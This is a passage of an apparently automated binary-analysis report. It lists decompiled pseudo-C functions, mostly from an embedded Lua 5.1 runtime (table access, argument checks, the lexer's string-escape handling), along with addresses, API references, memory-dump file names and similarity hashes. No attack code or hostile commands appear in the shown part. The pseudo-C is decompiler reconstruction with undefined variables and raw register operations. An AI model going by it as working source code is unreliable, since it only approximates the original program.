				E10001C30(_t23, _t24, _t14, _t17, 0);
				E10001EB0(_t23, _t14, _t17, _t12);
				_push(_t12);
				E10001910(_t24, _t14);
				return E10001EB0(_t23, _t14, _t17, 0);
			}

0x1000fcd0
0x1000fcd1
0x1000fcd7
0x1000fd23
0x1000fd23
0x1000fcda
0x1000fcdf
0x1000fce5
0x1000fce7
0x1000fced
0x1000fcf0
0x1000fcf5
0x1000fcf8
0x1000fcf8
0x1000fced
0x1000fd00
0x1000fd08
0x1000fd0d
0x1000fd0f
0x00000000

APIs

lua_gettop.LUA5.1(?), ref: 1000FCF0
lua_rawgeti.LUA5.1(?,?,00000000), ref: 1000FD00
lua_rawseti.LUA5.1(?,?,?,?,?,00000000), ref: 1000FD08
lua_pushinteger.LUA5.1(?,?,?,?,?,?,?,00000000), ref: 1000FD0F
lua_rawseti.LUA5.1(?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 1000FD18

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_rawseti.$lua_gettop.lua_pushinteger.lua_rawgeti.
String ID:
API String ID: 1628033441-0
Opcode ID: 3b9965e1af6fdcbe214ac6bc5389dfbe58390c43f563a422c964ec3163dd33a0
Instruction ID: ffe6777080df0799ebc814a587712267bde4526f9aaf40c369506bec4ab3f8c2
Opcode Fuzzy Hash: 3b9965e1af6fdcbe214ac6bc5389dfbe58390c43f563a422c964ec3163dd33a0
Instruction Fuzzy Hash: F4F0A076A0126536F211DA554CC2FBFA6ADDFD6AD0F05042DFE04A31064710BD09A2F6

Uniqueness

Uniqueness Score: -1.00%

Function 10013AC0, Relevance: 7.5, APIs: 5, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10013AC0(void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				void* _t6;
				void* _t11;
				signed int _t12;

				_t21 = __eflags;
				_t15 = _a4;
				E10001B90(_t11, __eflags, _a4, 0xffffffff, _a8);
				if(E10001410(_t21, _a4, 0xffffffff) != 0) {
					_t6 = E100016C0(__eflags, _t15, 0xffffffff);
					E10001160(_t15, 0xfffffffe);
					return _t6;
				} else {
					E10001160(_t15, 0xfffffffe);
					return _t12 | 0xffffffff;
				}
			}

0x10013ac0
0x10013ac5
0x10013ace
0x10013ae0
0x10013af8
0x10013b05
0x10013b11
0x10013ae2
0x10013ae8
0x10013af4
0x10013af4

APIs

lua_getfield.LUA5.1(?,000000FF,?,?,?,10013A73,?,isdst,?,year,000000FF,?,month,000000FF), ref: 10013ACE

Part of subcall function 10001B90: luaS_newlstr.LUA5.1(?,?,?,?,?), ref: 10001BBA

lua_type.LUA5.1(?,000000FF,?,000000FF,?,?,?,10013A73,?,isdst,?,year,000000FF,?,month,000000FF), ref: 10013AD6
lua_settop.LUA5.1(?,000000FE,year,000000FF,?,month,000000FF), ref: 10013AE8
lua_toboolean.LUA5.1(?,000000FF,year,000000FF,?,month,000000FF), ref: 10013AF8
lua_settop.LUA5.1(?,000000FE,?,?,year,000000FF,?,month,000000FF), ref: 10013B05

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_settop.$S_newlstr.lua_getfield.lua_toboolean.lua_type.
String ID:
API String ID: 3602003842-0
Opcode ID: 88a2de51237559f628ea00039f3450157d3dafc63f101e52e875cd0ed38c9131
Instruction ID: 25ac0aee695646d7aeecfd027ccbf33164c5a2af47e178d29d4ae8de16ae224d
Opcode Fuzzy Hash: 88a2de51237559f628ea00039f3450157d3dafc63f101e52e875cd0ed38c9131
Instruction Fuzzy Hash: 9EE0126FA0D432726401A11D7C02CDF364ECFC71F6B690331FA75A22EAFA11A94602F6

Uniqueness

Uniqueness Score: -1.00%

Function 10011670, Relevance: 7.5, APIs: 5, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10011670(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _t5;
				void* _t13;
				intOrPtr _t14;

				_t5 = _a8;
				_t14 = _a4;
				_t20 = _t14 - _t5;
				if(_t14 != _t5) {
					E10001090(_t5, _t14, 1);
					return E10001DD0(_t13, __eflags, _t14, 0xfffffffe, _a12);
				} else {
					E100013D0(_t20, _t14, 0xfffffffe);
					E100011B0(_t20, _t14, 0xfffffffd);
					return E10001DD0(_t13, _t20, _t14, 0xfffffffe, _a12);
				}
			}

0x10011670
0x10011675
0x10011679
0x1001167b
0x100116a6
0x100116bf
0x1001167d
0x10011680
0x10011688
0x100116a1
0x100116a1

APIs

lua_pushvalue.LUA5.1(?,000000FE,?,100115C7,?,00000000,func), ref: 10011680
lua_remove.LUA5.1(?,000000FD,?,000000FE,?,100115C7,?,00000000,func), ref: 10011688
lua_setfield.LUA5.1(?,000000FE,?,?,100115C7,?,00000000,func), ref: 10011698

Part of subcall function 10001DD0: luaS_newlstr.LUA5.1(?,?,?,?,?), ref: 10001DFA

lua_xmove.LUA5.1(?,?,00000001,?,100115C7,?,00000000,func), ref: 100116A6
lua_setfield.LUA5.1(?,000000FE,?,100115C7,?,00000000,func), ref: 100116B6

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_setfield.$S_newlstr.lua_pushvalue.lua_remove.lua_xmove.
String ID:
API String ID: 3199617591-0
Opcode ID: edfa1481b4c56c541a5e4c62495129d80be5d61d94cb4f63fca0a9a1974ac1dd
Instruction ID: 67173f87f446facc36bdb949723f8c573ee49fd284d70dcf4917023bd1e2a579
Opcode Fuzzy Hash: edfa1481b4c56c541a5e4c62495129d80be5d61d94cb4f63fca0a9a1974ac1dd
Instruction Fuzzy Hash: 65E06D7580D13236E901E21CBC42DDF278EDF822F4F140700F474761DAEA25AA9141EA

Uniqueness

Uniqueness Score: -1.00%

Function 10011120, Relevance: 7.5, APIs: 5, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E10011120(void* __ebx, void* __eflags, void* __fp0, intOrPtr _a4) {
				void* _t2;
				signed int _t6;

				_t15 = __eflags;
				_t12 = _a4;
				_t2 = E1000F5C0(__eflags, __fp0, _a4, 2);
				E1000F410(__ebx, __eflags, _a4, 1, 5);
				_push(_t2 + 1);
				E10001910(__fp0, _a4);
				E10001C30(_t15, __fp0, _t12, 1, _t2 + 1);
				_t6 = E10001410(_t15, _t12, 0xffffffff);
				asm("sbb eax, eax");
				return  ~_t6 & 0x00000002;
			}

0x10011120
0x10011121
0x10011129
0x10011135
0x1001113b
0x1001113d
0x10011146
0x1001114e
0x10011158
0x1001115f

APIs

luaL_checkinteger.LUA5.1(?,00000002), ref: 10011129

Part of subcall function 1000F5C0: lua_tointeger.LUA5.1(?,?), ref: 1000F5CD
Part of subcall function 1000F5C0: lua_isnumber.LUA5.1(?,?), ref: 1000F5DD

luaL_checktype.LUA5.1(?,00000001,00000005,?,00000002), ref: 10011135

Part of subcall function 1000F410: lua_type.LUA5.1(?,?), ref: 1000F41C

lua_pushinteger.LUA5.1(?,00000001,?,00000001,00000005,?,00000002), ref: 1001113D
lua_rawgeti.LUA5.1(?,00000001,00000001,?,00000001,?,00000001,00000005,?,00000002), ref: 10011146
lua_type.LUA5.1(?,000000FF,?,00000001,00000001,?,00000001,?,00000001,00000005,?,00000002), ref: 1001114E

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_type.$L_checkinteger.L_checktype.lua_isnumber.lua_pushinteger.lua_rawgeti.lua_tointeger.
String ID:
API String ID: 4088775282-0
Opcode ID: 57f9ea294582b0531f936359552e08e424800ded072699aa0fdc37b32a5ff9c9
Instruction ID: 31e8dccde113cbac957a81605149adfd83f17e6f203961eefe764f5c05c4ff7c
Opcode Fuzzy Hash: 57f9ea294582b0531f936359552e08e424800ded072699aa0fdc37b32a5ff9c9
Instruction Fuzzy Hash: 78E0C23A1A5A7034F92091386C0BFDF154CCFC3BE0F040A15F220B70DAE98976C240E9

Uniqueness

Uniqueness Score: -1.00%

Function 009930C0, Relevance: 7.5, APIs: 5, Instructions: 27
COMMON

Download Yara Rule

C-Code - Quality: 34%

			E009930C0(void* __eax, intOrPtr _a4) {
				intOrPtr _t5;

				_t5 = _a4;
				_push(0xffffffff);
				_push(_t5);
				L00994AFA();
				if(__eax != 5) {
					return 0;
				} else {
					_push(0x3ff00000);
					_push(0);
					_push(_t5);
					L00994B5A();
					_push(0xfffffffe);
					_push(_t5);
					L00994B00();
					_push(_t5);
					L00994B4E();
					_push(0xfffffffe);
					_push(_t5);
					L00994BB4();
					return 1;
				}
			}

0x009930c1
0x009930c5
0x009930c7
0x009930c8
0x009930d3
0x00993105
0x009930d5
0x009930d5
0x009930da
0x009930dc
0x009930dd
0x009930e2
0x009930e4
0x009930e5
0x009930ea
0x009930eb
0x009930f0
0x009930f2
0x009930f3
0x00993101
0x00993101

APIs

lua_type.LUA5.1(0099308D,000000FF,?,0099308D,?), ref: 009930C8
lua_pushnumber.LUA5.1(0099308D,00000000,3FF00000,0099308D,?), ref: 009930DD
lua_gettable.LUA5.1(0099308D,000000FE,0099308D,00000000,3FF00000,0099308D,?), ref: 009930E5
lua_pushnil.LUA5.1(0099308D,0099308D,000000FE,0099308D,00000000,3FF00000,0099308D,?), ref: 009930EB
lua_insert.LUA5.1(0099308D,000000FE,0099308D,0099308D,000000FE,0099308D,00000000,3FF00000,0099308D,?), ref: 009930F3

Memory Dump Source

Source File: 00000003.00000002.486716165.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true

Associated: 00000003.00000002.486684810.0000000000990000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486748403.0000000000995000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486779033.0000000000996000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.486820104.0000000000997000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_gettable.lua_insert.lua_pushnil.lua_pushnumber.lua_type.
String ID:
API String ID: 2733307388-0
Opcode ID: 538088b6d87649a1910de15a3921ae6004b6f7297cf08bd034242e1658f0681d
Instruction ID: 974682521da0735e0f3a82ce1bf440eda3b61f82dfef7823d22395983748dd6b
Opcode Fuzzy Hash: 538088b6d87649a1910de15a3921ae6004b6f7297cf08bd034242e1658f0681d
Instruction Fuzzy Hash: 1DE0EC2151E43131DD22352C3C42FCE124A4F96331F254751F536722E5D9489A8301EE

Uniqueness

Uniqueness Score: -1.00%

Function 10016A00, Relevance: 7.5, APIs: 5, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10016A00(intOrPtr _a4) {
				char _v100;
				void* _t13;

				_t10 = _a4;
				E10003F40(_a4, 1,  &_v100);
				E10004130(_a4, "f",  &_v100);
				E100013D0(_t13, _t10, 0xfffffffe);
				E10001FE0(_t13, _t10, 0xfffffffe);
				return E10001160(_t10, 0xfffffffe);
			}

0x10016a08
0x10016a10
0x10016a20
0x10016a28
0x10016a30
0x10016a44

APIs

lua_getstack.LUA5.1(?,00000001,00000000,?), ref: 10016A10
lua_getinfo.LUA5.1(?,10019DE0,?,?,00000001,00000000,?), ref: 10016A20

Part of subcall function 10004130: strchr.MSVCRT ref: 1000417D
Part of subcall function 10004130: luaD_growstack.LUA5.1(?,00000001), ref: 100041B2
Part of subcall function 10004130: strchr.MSVCRT ref: 100041C1

lua_pushvalue.LUA5.1(?,000000FE,?,10019DE0,?,?,00000001,00000000,?), ref: 10016A28
lua_setfenv.LUA5.1(?,000000FE,?,000000FE,?,10019DE0,?,?,00000001,00000000,?), ref: 10016A30
lua_settop.LUA5.1(?,000000FE,?,000000FE,?,000000FE,?,10019DE0,?,?,00000001,00000000,?), ref: 10016A38

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: strchr$D_growstack.lua_getinfo.lua_getstack.lua_pushvalue.lua_setfenv.lua_settop.
String ID:
API String ID: 297882601-0
Opcode ID: 0893a4471621c594c8f4178de3d5c2c98da76f6d3584796d30816f26927cb854
Instruction ID: 713b6634cd4742ef2314bbf4a46f0b4552ae3cfb51be84070b8263407ddf0f11
Opcode Fuzzy Hash: 0893a4471621c594c8f4178de3d5c2c98da76f6d3584796d30816f26927cb854
Instruction Fuzzy Hash: 99E0267941D23136E501E2049C03DEF724DDF560B0F100704F531220C9AF54730441EF

Uniqueness

Uniqueness Score: -1.00%

Function 10015600, Relevance: 7.5, APIs: 5, Instructions: 24
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E10015600(void* __fp0, intOrPtr _a4) {
				void* _t11;

				_t8 = _a4;
				E1000F4A0(_t11, _a4, 1, 0);
				E1000F4A0(_t11, _t8, 2, 0);
				E10001160(_t8, 2);
				_push(0);
				E10001910(__fp0, _t8);
				E10001A20(_t8, E10015640, 3);
				return 1;
			}

0x10015601
0x1001560a
0x10015614
0x1001561c
0x10015621
0x10015624
0x10015631
0x1001563f

APIs

luaL_checklstring.LUA5.1(?,00000001,00000000), ref: 1001560A

Part of subcall function 1000F4A0: lua_tolstring.LUA5.1(?,?,?,?,?,?,1000F292,?,?,00000000), ref: 1000F4B2

luaL_checklstring.LUA5.1(?,00000002,00000000,?,00000001,00000000), ref: 10015614
lua_settop.LUA5.1(?,00000002,?,00000002,00000000,?,00000001,00000000), ref: 1001561C
lua_pushinteger.LUA5.1(?,00000000,?,00000002,?,00000002,00000000,?,00000001,00000000), ref: 10015624
lua_pushcclosure.LUA5.1(?,10015640,00000003,?,00000000,?,00000002,?,00000002,00000000,?,00000001,00000000), ref: 10015631

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: L_checklstring.$lua_pushcclosure.lua_pushinteger.lua_settop.lua_tolstring.
String ID:
API String ID: 269969506-0
Opcode ID: b9de3ddfb799a50928b81552d67f429a5e6d38a6c483818718001c641bdd6d17
Instruction ID: d0dceb515ef5709edfafb2ba553cbea85748d15e7c3c3a25689857b6733325b3
Opcode Fuzzy Hash: b9de3ddfb799a50928b81552d67f429a5e6d38a6c483818718001c641bdd6d17
Instruction Fuzzy Hash: 70E0673979262035F422A218AC03FDF11088F06B94F944004B7007E1DA86DA7A8201EF

Uniqueness

Uniqueness Score: -1.00%

Function 00991180, Relevance: 7.5, APIs: 5, Instructions: 23
COMMON

Download Yara Rule

C-Code - Quality: 27%

			E00991180(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _t4;
				intOrPtr _t6;

				_t4 = _a8;
				_t6 = _a4;
				_push(_t4);
				_push(0xffffd8f0);
				_push(_t6);
				L00994B12();
				_push(_a12);
				_push(_t6);
				L00994AD0();
				_push(1);
				_push(_t6);
				L00994B0C();
				_push(0xfffffffd);
				_push(_t6);
				L00994AC4();
				_push(0xfffffffe);
				_push(_t6);
				L00994AB8();
				return _t4;
			}

0x00991180
0x00991185
0x00991189
0x0099118a
0x0099118f
0x00991190
0x00991199
0x0099119a
0x0099119b
0x009911a0
0x009911a2
0x009911a3
0x009911a8
0x009911aa
0x009911ab
0x009911b0
0x009911b2
0x009911b3
0x009911bc

APIs

lua_getfield.LUA5.1(?,FFFFD8F0,?), ref: 00991190
lua_pushstring.LUA5.1(?,?,?,FFFFD8F0,?), ref: 0099119B
lua_pushboolean.LUA5.1(?,00000001,?,?,?,FFFFD8F0,?), ref: 009911A3
lua_rawset.LUA5.1(?,000000FD,?,00000001,?,?,?,FFFFD8F0,?), ref: 009911AB
lua_settop.LUA5.1(?,000000FE,?,000000FD,?,00000001,?,?,?,FFFFD8F0,?), ref: 009911B3

Memory Dump Source

Source File: 00000003.00000002.486716165.0000000000991000.00000020.00020000.sdmp, Offset: 00990000, based on PE: true

Associated: 00000003.00000002.486684810.0000000000990000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486748403.0000000000995000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.486779033.0000000000996000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.486820104.0000000000997000.00000002.00020000.sdmp Download File

Similarity

API ID: lua_getfield.lua_pushboolean.lua_pushstring.lua_rawset.lua_settop.
String ID:
API String ID: 391719093-0
Opcode ID: 7a4889f910de75a72596cb97c79714528e35fe722f1f5805dffe8bde5c78ab47
Instruction ID: d95554c99243486212f0af19818999a8c14f388c965ef8dc454f2d948098d3d5
Opcode Fuzzy Hash: 7a4889f910de75a72596cb97c79714528e35fe722f1f5805dffe8bde5c78ab47
Instruction Fuzzy Hash: D7E0EC6115A5313A8D06B65C9C42FDF225D9FC6224F140304F160221E19A54A98392EE

Uniqueness

Uniqueness Score: -1.00%

Function 10010640, Relevance: 7.5, APIs: 5, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10010640(void* __ebx, intOrPtr _a4) {
				void* _t12;

				_t8 = __ebx;
				_t9 = _a4;
				E1000F410(__ebx, _t12, _a4, 1, 5);
				E1000F470(__ebx, _t12, _t9, 2);
				E1000F470(_t8, _t12, _t9, 3);
				E10001160(_t9, 3);
				E10001E40(_t12, _t9, 1);
				return 1;
			}

0x10010640
0x10010641
0x1001064a
0x10010652
0x1001065a
0x10010662
0x1001066a
0x10010678

APIs

luaL_checktype.LUA5.1(?,00000001,00000005), ref: 1001064A

Part of subcall function 1000F410: lua_type.LUA5.1(?,?), ref: 1000F41C

luaL_checkany.LUA5.1(?,00000002,?,00000001,00000005), ref: 10010652

Part of subcall function 1000F470: lua_type.LUA5.1(?,?), ref: 1000F47C
Part of subcall function 1000F470: luaL_argerror.LUA5.1(?,?,value expected), ref: 1000F490

luaL_checkany.LUA5.1(?,00000003,?,00000002,?,00000001,00000005), ref: 1001065A
lua_settop.LUA5.1(?,00000003,?,00000003,?,00000002,?,00000001,00000005), ref: 10010662
lua_rawset.LUA5.1(?,00000001,?,00000003,?,00000003,?,00000002,?,00000001,00000005), ref: 1001066A

Memory Dump Source

Source File: 00000003.00000002.495890143.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.495868101.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496034889.0000000010017000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.496071357.0000000010019000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.496100513.000000001001A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.496130181.000000001001B000.00000002.00020000.sdmp Download File

Similarity

API ID: L_checkany.lua_type.$L_argerror.L_checktype.lua_rawset.lua_settop.
String ID:
API String ID: 3589126800-0
Opcode ID: 80f636896de74bebd6a6b13be26071d99a956c716fe2d70cef985dbcc84da090
Instruction ID: ce74f83a347c70c4c9ab7dd5de00575f7d715a37a8ee23cd0f0d13836c65c428
Opcode Fuzzy Hash: 80f636896de74bebd6a6b13be26071d99a956c716fe2d70cef985dbcc84da090
Instruction Fuzzy Hash: 46D09E39696B2031F422B228BC47FDF110D8F06B84F014014FB40395CA97CA37C211EE

Uniqueness

Uniqueness Score: -1.00%

Function 10008460, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 236
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E10008460(void* __ebx, void* __edi, void* __eflags) {
				signed int** _t56;
				signed int _t58;
				signed int** _t60;
				signed int _t62;
				intOrPtr _t64;
				intOrPtr _t66;
				void* _t75;
				signed int* _t78;
				signed int* _t80;
				signed int** _t84;
				void* _t85;
				signed int** _t89;
				signed int* _t95;
				signed int* _t102;
				void* _t104;
				intOrPtr* _t106;
				void* _t109;
				void* _t110;
				void* _t111;

				_t104 = __edi;
				_t75 = __ebx;
				_t106 =  *((intOrPtr*)(_t109 + 8));
				E10007620(_t106,  *_t106);
				_t56 =  *(_t106 + 0x38);
				_t110 = _t109 + 8;
				_t78 =  *_t56;
				 *_t56 = _t78 - 1;
				if(_t78 <= 0) {
					_t58 = E1000EF10( *(_t106 + 0x38));
					_t110 = _t110 + 4;
				} else {
					_t89 =  *(_t106 + 0x38);
					_t102 = _t89[1];
					_t58 =  *_t102;
					_t89[1] =  &(_t102[0]);
				}
				 *_t106 = _t58;
				if(_t58 !=  *((intOrPtr*)(_t110 + 0xc))) {
					_push(_t75);
					_push(_t104);
					do {
						_t66 =  *_t106;
						_t9 = _t66 + 1; // 0x1
						_t85 = _t9;
						if(_t85 > 0x5d) {
							L21:
							_push(_t66);
							goto L28;
						} else {
							switch( *((intOrPtr*)(0 +  &M100086EC))) {
								case 0:
									E10007560(_t117, _t106, "unfinished string", 0x11f);
									_t110 = _t110 + 0xc;
									goto L44;
								case 1:
									__eax = E10007560(__eflags, __esi, "unfinished string", 0x11e);
									goto L44;
								case 2:
									__eax = __esi[0xe];
									__ecx =  *__eax;
									__eflags = __ecx;
									 *__eax = __ecx - 1;
									if(__ecx <= 0) {
										__eax = __esi[0xe];
										__eax = E1000EF10(__esi[0xe]);
									} else {
										__ecx = __esi[0xe];
										__eax = 0;
										__esi[0xe][1] = __esi[0xe][1] + 1;
									}
									_t19 = __eax + 1; // 0x1
									__ecx = _t19;
									 *__esi = __eax;
									__eflags = _t19 - 0x77;
									if(__eflags > 0) {
										L23:
										__ecx = __imp____mb_cur_max;
										__eflags =  *__imp____mb_cur_max - 1;
										if( *__imp____mb_cur_max <= 1) {
											__ecx =  *__imp___pctype;
											__eax = __eax & 0x00000004;
											__eflags = __eax;
										} else {
											_push(4);
											_push(__eax);
											__eax =  *__ebx();
											__esp = __esp + 8;
										}
										__eflags = __eax;
										if(__eax != 0) {
											__ebp = 0;
											__edi = 0;
											__eflags = 0;
											while(1) {
												__eax = __esi[0xe];
												_t34 = (__edi + __edi * 4) * 2; // 0x75974120
												__edi =  *__esi + _t34 - 0x30;
												__ecx =  *__eax;
												__eflags = __ecx;
												_t36 = __ecx - 1; // 0x759753f3
												 *__eax = _t36;
												if(__ecx <= 0) {
													__eax = __esi[0xe];
													__eax = E1000EF10(__esi[0xe]);
												} else {
													__ecx = __esi[0xe];
													__eax = 0;
													 *((intOrPtr*)(__esi[0xe] + 4)) = __esi[0xe][1] + 1;
												}
												__ebp = __ebp + 1;
												 *__esi = __eax;
												__eflags = __ebp - 3;
												if(__ebp >= 3) {
													break;
												}
												__ecx = __imp____mb_cur_max;
												__eflags =  *__imp____mb_cur_max - 1;
												if( *__imp____mb_cur_max <= 1) {
													__ecx =  *__imp___pctype;
													__eax = __eax & 0x00000004;
													__eflags = __eax;
												} else {
													_push(4);
													_push(__eax);
													__eax =  *__ebx();
													__esp = __esp + 8;
												}
												__eflags = __eax;
												if(__eax != 0) {
													continue;
												}
												break;
											}
											__eflags = __edi - 0xff;
											if(__eflags > 0) {
												__eax = E10007560(__eflags, __esi, "escape sequence too large", 0x11e);
											}
											__eax = E10007620(__esi, __edi);
										} else {
											_push( *__esi);
											goto L28;
										}
									} else {
										switch( *((intOrPtr*)(0 +  &M1000875C))) {
											case 0:
												goto L44;
											case 1:
												E10007620(__esi, 0xa) = E10007E80(__esi);
												goto L44;
											case 2:
												__eax = 7;
												_push(7);
												goto L28;
											case 3:
												__eax = 8;
												_push(8);
												goto L28;
											case 4:
												__eax = 0xc;
												_push(0xc);
												goto L28;
											case 5:
												__eax = 0xa;
												_push(0xa);
												goto L28;
											case 6:
												__eax = 0xd;
												_push(0xd);
												goto L28;
											case 7:
												__eax = 9;
												_push(9);
												L28:
												_push(_t106);
												E10007620();
												_t68 =  *(_t106 + 0x38);
												_t113 = _t110 + 8;
												_t86 =  *_t68;
												__eflags = _t86;
												 *_t68 = _t86 - 1;
												if(__eflags <= 0) {
													_t70 = E1000EF10( *(_t106 + 0x38));
													_t110 = _t113 + 4;
												} else {
													_t88 =  *(_t106 + 0x38);
													_t100 = _t88[1];
													_t70 =  *_t100;
													_t88[1] =  &(_t100[0]);
												}
												 *_t106 = _t70;
												goto L44;
											case 8:
												__eax = 0xb;
												goto L21;
											case 9:
												goto L23;
										}
									}
									goto L44;
								case 3:
									goto L21;
							}
						}
						L44:
					} while ( *_t106 !=  *((intOrPtr*)(_t110 + 0x18)));
				}
				E10007620(_t106,  *_t106);
				_t60 =  *(_t106 + 0x38);
				_t111 = _t110 + 8;
				_t80 =  *_t60;
				 *_t60 = _t80 - 1;
				if(_t80 <= 0) {
					_t62 = E1000EF10( *(_t106 + 0x38));
					_t111 = _t111 + 4;
				} else {
					_t84 =  *(_t106 + 0x38);
					_t95 = _t84[1];
					_t62 =  *_t95;
					_t84[1] =  &(_t95[0]);
				}
				 *_t106 = _t62;
				_t64 = E100076C0( *((intOrPtr*)( *((intOrPtr*)(_t106 + 0x3c)))) + 1, _t106,  *((intOrPtr*)( *((intOrPtr*)(_t106 + 0x3c)))) + 1,  *((intOrPtr*)( *((intOrPtr*)(_t106 + 0x3c)) + 4)) - 2);
				 *((intOrPtr*)( *((intOrPtr*)(_t111 + 0x1c)))) = _t64;
				return _t64;
			}

0x10008460
0x10008460
0x10008461
0x10008469
0x1000846e
0x10008471
0x10008474
0x1000847b
0x1000847d
0x10008493
0x10008498
0x1000847f
0x1000847f
0x10008484
0x10008487
0x1000848a
0x1000848a
0x1000849f
0x100084a3
0x100084a9
0x100084b1
0x100084b2
0x100084b2
0x100084b4
0x100084b4
0x100084ba
0x10008577
0x10008577
0x00000000
0x100084c0
0x100084c8
0x00000000
0x100084da
0x100084df
0x00000000
0x00000000
0x100084f2
0x00000000
0x00000000
0x100084ff
0x10008502
0x10008504
0x10008509
0x1000850b
0x1000851d
0x10008521
0x1000850d
0x1000850d
0x10008510
0x10008518
0x10008518
0x10008529
0x10008529
0x1000852c
0x1000852e
0x10008531
0x10008590
0x10008590
0x10008596
0x10008599
0x100085ab
0x100085b0
0x100085b0
0x1000859b
0x1000859b
0x1000859d
0x1000859e
0x100085a0
0x100085a0
0x100085b3
0x100085b5
0x100085e8
0x100085ea
0x100085ea
0x100085ec
0x100085ee
0x100085f4
0x100085f4
0x100085f8
0x100085fa
0x100085fc
0x100085ff
0x10008601
0x10008613
0x10008617
0x10008603
0x10008603
0x10008606
0x1000860e
0x1000860e
0x1000861f
0x10008620
0x10008622
0x10008625
0x00000000
0x00000000
0x10008627
0x1000862d
0x10008630
0x10008642
0x10008647
0x10008647
0x10008632
0x10008632
0x10008634
0x10008635
0x10008637
0x10008637
0x1000864a
0x1000864c
0x00000000
0x00000000
0x00000000
0x1000864c
0x1000864e
0x10008654
0x10008661
0x10008666
0x1000866b
0x100085b7
0x100085b9
0x00000000
0x100085b9
0x10008533
0x1000853b
0x00000000
0x00000000
0x00000000
0x10008583
0x00000000
0x00000000
0x10008542
0x10008547
0x00000000
0x00000000
0x1000854a
0x1000854f
0x00000000
0x00000000
0x10008552
0x10008557
0x00000000
0x00000000
0x1000855a
0x1000855f
0x00000000
0x00000000
0x10008562
0x10008567
0x00000000
0x00000000
0x1000856a
0x1000856f
0x100085ba
0x100085ba
0x100085bb
0x100085c0
0x100085c3
0x100085c6
0x100085c8
0x100085cd
0x100085cf
0x10008679
0x1000867e
0x100085d5
0x100085d5
0x100085da
0x100085dd
0x100085e0
0x100085e0
0x10008681
0x00000000
0x00000000
0x10008572
0x00000000
0x00000000
0x00000000
0x00000000
0x1000853b
